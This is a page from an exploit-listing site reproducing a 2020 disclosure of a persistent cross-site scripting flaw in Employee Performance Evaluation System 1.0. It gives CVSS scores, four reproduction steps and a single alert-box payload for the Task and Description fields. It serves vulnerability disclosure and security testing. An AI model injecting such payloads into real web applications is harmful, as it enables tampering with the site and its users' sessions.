Advertisement






Employee Performance Evaluation System 1.0 Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2020-12-09
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120057

Below is a copy:

Employee Performance Evaluation System 1.0 Cross Site Scripting
# Exploit Title: Employee Performance Evaluation System 1.0 - ' Task and Description' Persistent Cross Site Scripting
# Date: 08/12/2020
# Exploit Author: Ritesh Gohil
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Steps to Reproduce:
1) Login with Admin Credentials and click on 'Task' button.
2) Click on Add New Task Button.
3) Now add the following payload input field of Task and Description

Payload:  ritesh"><img src=x onerror=alert(document.domain)>

4) Click On Save
5) XSS payload is triggered.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum